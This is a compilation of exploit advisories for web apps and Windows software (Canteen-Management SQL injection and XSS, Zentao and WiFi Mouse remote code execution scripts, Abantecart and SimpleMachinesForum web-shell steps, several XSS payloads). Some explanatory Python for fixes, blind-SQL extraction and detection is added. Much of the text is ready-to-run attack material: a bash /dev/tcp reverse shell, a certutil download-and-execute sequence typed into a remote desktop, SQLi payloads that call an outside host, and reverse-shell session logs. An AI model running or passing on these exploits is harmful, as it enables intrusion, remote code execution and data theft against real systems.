## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

## Description:
The username parameter of Canteen-Management 1.0 (2022) appears to be vulnerable to SQL injection attacks. A malicious user can attack this system remotely and use this vulnerability to steal all information from its database.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)

## Proof and Exploit:
[href](https://streamable.com/vvz2lh)
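The sqlmap output above lists a boolean-based and a time-based blind injection in the username parameter; the ImpressCMS entry earlier on this page uses the same SLEEP()-based technique against mimetypeid. Neither advisory shows the query behind the bug or how data is actually pulled out through a blind oracle, so the following Python is an added illustration, not code from either advisory or product: it builds a throwaway SQLite login table, places the string-concatenated query that makes the injection possible next to the parameterised one, and then recovers a stored secret character by character through the boolean oracle (binary search on the character's code point, so about seven requests per character). The table, its contents and the column names are constructed for the demo. With a time-based oracle the extraction loop is identical; only oracle() changes to measure the response delay instead of checking the login result.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's users table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'h5F!l8j!Y6'), ('guest', 'guest')")
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """The injectable pattern: user input concatenated straight into the SQL text."""
    sql = f"SELECT 1 FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username: str, password: str) -> bool:
    """Parameterised query: the driver sends values separately, so quotes in input are data."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def oracle(conn, condition: str) -> bool:
    """Boolean-blind oracle: the login succeeds exactly when `condition` is true.

    The trailing '-- ' comments out the rest of the original WHERE clause,
    the same job the "AND 'gzCy'='gzCy" tail does in the sqlmap payload above.
    """
    return login_vulnerable(conn, f"admin' AND ({condition}) -- ", "irrelevant")


def extract_column(conn, column: str, where: str, max_len: int = 64) -> str:
    """Recover (SELECT column FROM users WHERE where) one character at a time."""
    subquery = f"(SELECT {column} FROM users WHERE {where})"
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({subquery}) >= {pos}"):
            break                                    # string is exhausted
        lo, hi = 0, 127                              # ASCII range; widen for UTF-8 data
        while lo < hi:                               # binary search on the code point
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({subquery}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = build_db()
    print("bypass on vulnerable login:", login_vulnerable(conn, "admin' -- ", "wrong"))
    print("bypass on fixed login:     ", login_fixed(conn, "admin' -- ", "wrong"))
    print("extracted:", extract_column(conn, "password", "username='admin'"))
```

The fix is entirely in login_fixed(): once the value travels as a bound parameter there is no query text for the attacker to rewrite, and neither the comment trick nor the SLEEP() subquery has anything to attach to.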

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

# Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path
# Exploit Author: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.infonetsoftware.com
# Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe
# Tested Version: 3.7.27
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """

servermedicontservice  servermedicontservice  C:\Program Files (x86)\medicont3\servermedicontservice.exe  Auto

# Service info:

C:\>sc qc "servermedicontservice"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: servermedicontservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\medicont3\servermedicontservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : servermedicontservice
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
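The wmic/findstr pipeline above finds the service; what makes it exploitable is the combination shown in the sc qc output: an unquoted BINARY_PATH_NAME containing spaces, AUTO_START, and SERVICE_START_NAME LocalSystem. As an added example (not part of the advisory), the following Python parses that sc qc output and lists, in the order CreateProcess tries them, the file names an attacker would have to be able to create (C:\Program.exe, then C:\Program Files.exe) before the real binary is reached. The parsing of the sc qc text is written here for the demo; the sample it runs on is the output reproduced in the advisory.

```python
import re

# sc qc output as reproduced in the advisory (raw string: Windows paths contain backslashes)
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: servermedicontservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\medicont3\servermedicontservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : servermedicontservice
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output: str) -> dict:
    """Turn the 'NAME : value' lines of sc qc into a dict (the [SC] banner is skipped)."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def executable_part(binary_path: str) -> str:
    """Strip service arguments: everything up to and including the first '.exe'."""
    p = binary_path.strip()
    idx = p.lower().find(".exe")
    return p[: idx + 4] if idx != -1 else p


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """The vulnerable shape: no surrounding quotes and a space inside the executable path."""
    p = binary_path.strip()
    if p.startswith('"'):
        return False
    return " " in executable_part(p)


def hijack_candidates(binary_path: str) -> list:
    """Paths CreateProcess tries, in order, before the intended binary: one per space."""
    if not is_unquoted_with_spaces(binary_path):
        return []
    exe = executable_part(binary_path.strip())
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def assess_service(sc_qc_output: str) -> dict:
    """Combine the three conditions that make an unquoted path a privilege escalation."""
    cfg = parse_sc_qc(sc_qc_output)
    path = cfg.get("BINARY_PATH_NAME", "")
    runs_as = cfg.get("SERVICE_START_NAME", "")
    unquoted = is_unquoted_with_spaces(path)
    auto_start = "AUTO_START" in cfg.get("START_TYPE", "")
    privileged = runs_as.lower() in ("localsystem", "nt authority\\system")
    return {
        "service": cfg.get("SERVICE_NAME"),
        "binary_path": path,
        "unquoted": unquoted,
        "candidates": hijack_candidates(path),
        "runs_as": runs_as,
        "auto_start": auto_start,
        "privileged_auto_start": unquoted and auto_start and privileged,
    }


if __name__ == "__main__":
    for key, val in assess_service(SC_QC_OUTPUT).items():
        print(f"{key:>22}: {val}")
```

The candidate list is also the caveat the advisory's last paragraph hints at: the first two names live directly under C:\ and C:\Program Files, which a standard user cannot write to by default, so the finding is only exploitable where those ACLs have been loosened or a writable directory appears earlier in the path.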

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

# Exploit Title: FlatCore CMS 2.1.1 - Stored Cross Site Scripting
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://flatcore.org/
# Version: 2.1.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/install/index.php
2- Write the XSS payload into the username of the user account.
3- Press the "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script>
# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: mister0xf
# Date: 2022-10-8
# Software Link: https://github.com/easysoft/zentaopms
# Version: tested on 17.0 (probably works also on newer/older versions)
# Tested On: Kali Linux 2022.2
# Exploit Tested Using: Python 3.10.4
# Vulnerability Description:
# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing
# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver
# Vulnerable Source Code:
# /module/repo/model.php:
# [...]
# $client = $this->post->client; // <-- client is taken from the POST request
# [...]
# elseif($scm == 'Git')
# {
#     if(!is_dir($path))
#     {
#         dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);
#         return false;
#     }
#
#     if(!chdir($path))
#     {
#         if(!is_executable($path))
#         {
#             dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);
#             return false;
#         }
#         dao::$errors['path'] = $this->lang->repo->error->path;
#         return false;
#     }
#
#     $command = "$client tag 2>&1"; // <-- command is injected here
#     exec($command, $output, $result);

import requests, sys
import hashlib
from urllib.parse import urlparse
from bs4 import BeautifulSoup


def banner():
    print('''::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ########''')


def usage():
    print('Usage: zenciao user password http://127.0.0.1/path')


def main():
    if ((len(sys.argv) - 1) != 3):
        usage()
        banner()
        exit()

    #proxy = {'http':'http://127.0.0.1:8080'}
    banner()
    username = sys.argv[1]
    password = sys.argv[2]
    target = sys.argv[3]

    # initialize session object
    session = requests.session()
    home_url = target + '/index.php'
    rand_url = target + '/index.php?m=user&f=refreshRandom&t=html'
    login_url = target + '/index.php?m=user&f=login&t=html'
    create_repo_url = target + '/index.php?m=repo&f=create&objectID=0'

    # follow the JavaScript redirect on the front page to initialise the session
    r1 = session.get(home_url)
    soup = BeautifulSoup(r1.text, "html.parser")
    script_tag = soup.find('script')
    redirect_url = script_tag.string.split("'")[1]
    r2 = session.get(target + redirect_url)

    # get random value
    session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
    res = session.get(rand_url)
    rand = res.text

    # compute md5(md5(password)+rand)
    md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest() + str(rand)).encode())

    # login request
    post_data = {"account": username, "password": md5_pwd.hexdigest(), "passwordStrength": 1,
                 "referer": "/zentaopms/www/", "verifyRand": rand, "keepLogin": 0, "captcha": ""}
    my_referer = target + '/zentaopms/www/index.php?m=user&f=login&t=html'
    session.headers.update({'Referer': my_referer})
    session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
    response = session.post(login_url, data=post_data)

    # exploit rce
    # devops repo page
    r2 = session.get(create_repo_url)
    git_test_dir = '/home/'
    command = 'whoami;'   # becomes "whoami; tag 2>&1" in exec()
    exploit_post_data = {"SCM": "Git", "name": "", "path": git_test_dir, "encoding": "utf-8",
                         "client": command, "account": "", "password": "", "encrypt": "base64", "desc": ""}
    r3 = session.post(create_repo_url, data=exploit_post_data)
    print(r3.content)


if __name__ == '__main__':
    main()
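The quoted model.php shows the whole bug in one line: exec("$client tag 2>&1") hands a POST-controlled string to a shell, so a client value of "whoami;" runs whoami and only then tries to run "tag". As an added example, not code from the advisory or from Zentao, the following Python puts that vulnerable pattern next to the two changes that remove it: executing an argument vector instead of a shell string (so ";", "|" and "$(...)" are never interpreted) and accepting only an allowlisted binary for the client. The allowlist contents and the use of a shell-based echo to make the injection visible are constructed for the demo.

```python
import subprocess

# Assumed allowlist: the absolute paths an administrator may choose as the SCM client.
ALLOWED_CLIENTS = {"/usr/bin/git", "/usr/bin/svn"}


def list_tags_vulnerable(client: str, repo_dir: str) -> str:
    """Mirror of the PHP: the client string is interpolated into a shell command line."""
    proc = subprocess.run(f"{client} tag 2>&1", shell=True, cwd=repo_dir,
                          stdout=subprocess.PIPE, text=True)
    return proc.stdout


def validate_client(client: str) -> str:
    """Reject anything that is not an exact allowlisted binary path."""
    if client not in ALLOWED_CLIENTS:
        raise ValueError(f"client binary not in allowlist: {client!r}")
    return client


def client_rejected(client: str) -> bool:
    """True if validate_client() refuses the value."""
    try:
        validate_client(client)
    except ValueError:
        return True
    return False


def list_tags_fixed(client: str, repo_dir: str) -> str:
    """Argument-vector execution of an allowlisted client: no shell, no injection surface."""
    argv = [validate_client(client), "tag"]
    proc = subprocess.run(argv, cwd=repo_dir, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True)
    return proc.stdout


def injected_marker_ran(client: str, repo_dir: str = ".") -> bool:
    """Run the vulnerable path with a client that echoes a marker; True if the marker came back."""
    return list_tags_vulnerable(client, repo_dir).startswith("INJECTED\n")


if __name__ == "__main__":
    evil_client = "echo INJECTED;"          # stands in for the advisory's 'whoami;'
    print("vulnerable path executed the injected command:", injected_marker_ran(evil_client))
    print("fixed path rejects it:", client_rejected(evil_client))
    print("fixed path accepts an allowlisted client:", not client_rejected("/usr/bin/git"))
```

Even without the allowlist, the argv form alone would turn "echo INJECTED;" into a program name that does not exist; the allowlist is what stops an attacker who can reach an arbitrary binary on the host from pointing the service at it.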

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Date: 2022-10-08
# Vendor Homepage: https://www.csphere.eu/
# Version: 2011.4
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
2- Write the XSS payload into the username field of the buddy list create form.
3- Press the "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script>

Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)

# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
# Date: 13-10-2022
# Author: Payal
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.2
# Tested on: Windows 10 Pro Build 21H2
# The desktop server software used by the mobile app has a PIN option which does not prevent command input.
# The connection response will be 'needpassword', which is only interpreted by the mobile app and prompts for PIN input.

#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys

target = socket(AF_INET, SOCK_STREAM)
port = 1978

try:
    rhost = sys.argv[1]
    lhost = sys.argv[2]
    payload = sys.argv[3]
except IndexError:
    print("USAGE: python " + sys.argv[0] + " <target-ip> <local-http-server-ip> <payload-name>")
    exit()

# Hex encoding of every character the server's 'utf8' keystroke message can carry
characters = {
    "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
    "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
    "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
    "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
    "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
    " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
    ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
    "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
    "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"
}

# The socket is connected in main(), so plain send() is used on the stream socket.

def openCMD():
    # 'openfile /C/Windows/System32/cmd.exe'
    target.send(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"))

def SendString(text):
    # Sends one character per 'utf8 <char>\n' message, with a short delay so the server keeps up
    for char in text:
        target.send(bytes.fromhex("7574663820" + characters[char] + "0a"))
        sleep(0.03)

def SendReturn():
    # 'key  3RTN' - Similar to 'Remote Mouse' mobile app
    target.send(bytes.fromhex("6b657920203352544e"))
    sleep(0.5)

def exploit():
    print("[+] 3..2..1..")
    sleep(2)
    openCMD()
    print("[+] *Super fast hacker typing*")
    sleep(1)
    SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)
    SendReturn()
    print("[+] Retrieving payload")
    sleep(3)
    SendString("C:\\Windows\\Temp\\" + payload)
    SendReturn()
    print("[+] Done! Check Your Listener?")

def main():
    target.connect((rhost, port))
    exploit()
    target.close()
    exit()

if __name__ == "__main__":
    main()
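The advisory shows that the WiFi Mouse server accepts its control messages ('openfile', 'utf8' keystrokes, 'key  3RTN') from any TCP client regardless of the PIN setting, so the only place a defender can see this happen is on the wire. The following is an added example, not part of the advisory or the vendor's software: a small parser that splits a captured client-to-server stream into events, rebuilds what was typed, and raises an alert when a shell interpreter is launched over port 1978. The message formats are decoded from the advisory's own hex strings; the sample stream, the list of interpreter names and the alert rules are constructed for this example.

```python
import re
from posixpath import basename

# Message shapes observed in the advisory's PoC (decoded from its hex):
#   "openfile <path>\n"   launch a file on the desktop
#   "utf8 <char>\n"       type one character
#   "key  3RTN"           press Return (sent without a trailing newline)
MSG_RE = re.compile(r"openfile (?P<path>[^\n]*)\n|utf8 (?P<char>[^\n]*)\n|key  (?P<key>3RTN)")

# Constructed list of interpreters whose launch over this channel is worth an alert.
SHELL_INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample: the advisory's openfile message, six typed characters, then Return.
SAMPLE_STREAM = (
    bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a")
    + b"".join(b"utf8 " + ch.encode() + b"\n" for ch in "whoami")
    + bytes.fromhex("6b657920203352544e")
)


def parse_stream(data):
    """Split a captured client->server TCP payload into (kind, value) events.
    Bytes that match none of the known message shapes are kept as 'unknown'."""
    text = data.decode("utf-8", errors="replace")
    events, pos = [], 0
    for m in MSG_RE.finditer(text):
        if m.start() != pos:
            events.append(("unknown", text[pos:m.start()]))
        if m.group("path") is not None:
            events.append(("openfile", m.group("path")))
        elif m.group("char") is not None:
            events.append(("type", m.group("char")))
        else:
            events.append(("enter", ""))
        pos = m.end()
    if pos != len(text):
        events.append(("unknown", text[pos:]))
    return events


def reconstruct_input(events):
    """Join the typed characters into the lines the remote desktop would have received."""
    lines, buf = [], ""
    for kind, value in events:
        if kind == "type":
            buf += value
        elif kind == "enter":
            lines.append(buf)
            buf = ""
    if buf:
        lines.append(buf)
    return lines


def find_alerts(events):
    """Return human-readable alerts for the behaviours the advisory relies on."""
    alerts = []
    for kind, value in events:
        if kind == "openfile":
            exe = basename(value.replace("\\", "/")).lower()
            if exe in SHELL_INTERPRETERS:
                alerts.append(f"openfile launched a shell interpreter: {value}")
    for line in reconstruct_input(events):
        low = line.lower()
        if "certutil" in low and "-urlcache" in low:
            alerts.append(f"typed command downloads a file with certutil: {line}")
    return alerts


if __name__ == "__main__":
    evs = parse_stream(SAMPLE_STREAM)
    for ev in evs:
        print(ev)
    print("typed:", reconstruct_input(evs))
    print("alerts:", find_alerts(evs))
```

The parser is deliberately tolerant of the 'key  3RTN' message having no terminator, because that is how the PoC emits it; a framing parser that assumed newline-delimited messages would silently glue it to the next keystroke. Feed it the reassembled payload of a port 1978 flow (from a pcap or a proxy) rather than individual packets, since the 0.03 s pacing in the PoC puts one character per segment.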
HireHackking

Abantecart v1.3.2 - Authenticated Remote Code Execution

# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 3rd Mar'2022
# CVE ID: CVE-2022-26521
# Confirmed on release 1.3.2
# Vendor: https://www.abantecart.com/download
###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
#Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
#Step4- Copy the Resource URL location and execute it in the browser e.g. : Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:

listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
 11:17:51 up  2:15,  1 user,  load average: 1.91, 1.93, 1.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bitnami  tty1     -                09:05    1:05m  0.20s  0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$
HireHackking

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26982
# Confirmed on release 2.1.1
# Vendor: https://download.simplemachines.org/
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
###############################################
#Step1- Login with Admin Credentials
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
#Step3- Now add the vulnerable php reverse tcp web shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
whoami
daemon
daemon@debian:/opt/bitnami/simplemachinesforum$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@debian:/opt/bitnami/simplemachinesforum$
HireHackking

Password Manager for IIS v2.0 - XSS

# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664

Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1

Affected Parameter in http payload:
ReturnURL=<script>alert(document.cookie)</script>
HireHackking

Canteen-Management v1.0 - XSS-Reflected

## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/>
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:
The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a malicious URL that breaks out of the attribute and redirects the victim to an attacker-controlled URL. When the victim clicks this crafted URL, the injected markup is rendered in their browser and the attack succeeds.

[+]Payload REQUEST:

```HTML
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

[+]Payload RESPONSE:

```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">
<style>
.footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; }
</style>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png">
<style type="text/css"> @media print { #printbtn { display : none; } } </style>
<title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title>
<link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
<link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
<link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" />
<link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet">
<link href="assets/css/helper.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
<link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
<link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet">
<link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
<link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet">
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
google.charts.load("current", {packages:["corechart"]});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
  var data = google.visualization.arrayToDataTable([
    ['Food', 'Average sale per Day'],
    ['Masala dosa', 11],
    ['Chicken 65 ', 2],
    ['Karapu Boondi', 2],
    ['Bellam Gavvalu', 2],
    ['Gummadikaya Vadiyalu', 7]
  ]);
  var options = { title: 'Food Average Sale per Day', pieHole: 0.4, };
  var chart = new google.visualization.PieChart(document.getElementById('donutchart'));
  chart.draw(data, options);
}
</script>
</head>
<body class="fix-header fix-sidebar">
<div id="page"></div>
<div id="loading"></div>
<div id="main-wrapper">
<div class="unix-login">
<div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover">
<div class="row">
<div class="col-lg-4 ml-auto">
<div class="login-content">
<div class="login-form">
<center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
<form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm">
<div class="form-group">
<input type="text" name="username" id="username" class="form-control" placeholder="Username" required="">
</div>
<div class="form-group">
<input type="password" id="password" name="password" class="form-control" placeholder="Password" required="">
</div>
